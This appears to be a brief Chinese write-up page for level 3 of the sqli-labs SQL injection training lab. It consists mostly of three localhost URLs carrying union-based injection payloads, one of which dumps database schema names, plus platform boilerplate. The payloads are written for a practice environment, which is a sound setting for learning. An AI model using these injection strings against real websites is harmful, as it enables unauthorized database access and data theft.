http://127.0.0.1/Less-3/?id=1
http://127.0.0.1/Less-3/?id=0%27)%20union%20select%201,2,3--+
http://127.0.0.1/Less-3/?id=0%27)%20union%20select%201,group_concat(schema_name),2%20from%20information_schema.schemata--+
[sqli-labs]Less-3(明注 , Bool盲注 , 时间盲注 , 报错注入)
最后编辑于 :
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
推荐阅读更多精彩内容
- 打开主页进入第一关 : 提示传入id这个参数 发现这个页面会根据传入的ID查询到对应的用户这里我们可以通过查看数据...
- 这道题发现页面中会显示出GET过去的参数不过好像没有URL解码...好奇怪 , 感觉好像是传过去之后又被编码了 ,...